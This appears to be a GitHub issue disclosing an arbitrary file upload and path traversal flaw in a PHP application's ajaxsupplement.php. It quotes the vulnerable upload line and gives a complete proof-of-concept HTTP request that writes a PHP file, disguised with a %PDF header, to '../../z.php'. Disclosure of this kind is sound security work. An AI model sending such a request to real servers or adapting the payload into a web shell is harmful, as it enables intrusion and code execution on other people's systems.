Skip to content
This repository has been archived by the owner on Jan 27, 2023. It is now read-only.

Arbitrary file upload in ajaxsupplement.php #155

Open
wednesdaygogo opened this issue Dec 18, 2022 · 0 comments
Open

Arbitrary file upload in ajaxsupplement.php #155

wednesdaygogo opened this issue Dec 18, 2022 · 0 comments

Comments

@wednesdaygogo
Copy link

Summary

The $_POST['filename'] is not filtered so that the php suffix file can be uploaded across directories.

Detail

Using the replace PDF function, an attacker can upload a file with php as the suffix and %PDF as the beginning of file content to any directory by controlling the filename parameter.

if (in_array($file_extension, array('doc', 'docx', 'vsd', 'xls', 'xlsx', 'ppt', 'pptx', 'odt', 'ods', 'odp')))
...
...
else
move_uploaded_file($_FILES['form_new_file']['tmp_name'], IL_TEMP_PATH . DIRECTORY_SEPARATOR . 'lib_' . session_id() . DIRECTORY_SEPARATOR . $_POST['filename']);

POC

like this

POST /ajaxsupplement.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------36332819052109193833351732483
Content-Length: 981
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/index2.php
Cookie: PHPSESSID=i7l1jt5cp8bbgt41p888aii2r7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="file"

1
-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="filename"

../../z.php
-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="form_new_file"; filename="1.php"
Content-Type: application/pdf

%PDF
<?php phpinfo();?>
-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="form_new_file_link"


-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="form_graphical_abstract"


-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="form_supplementary_file[]"


-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="proxystr"


-----------------------------36332819052109193833351732483--


Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant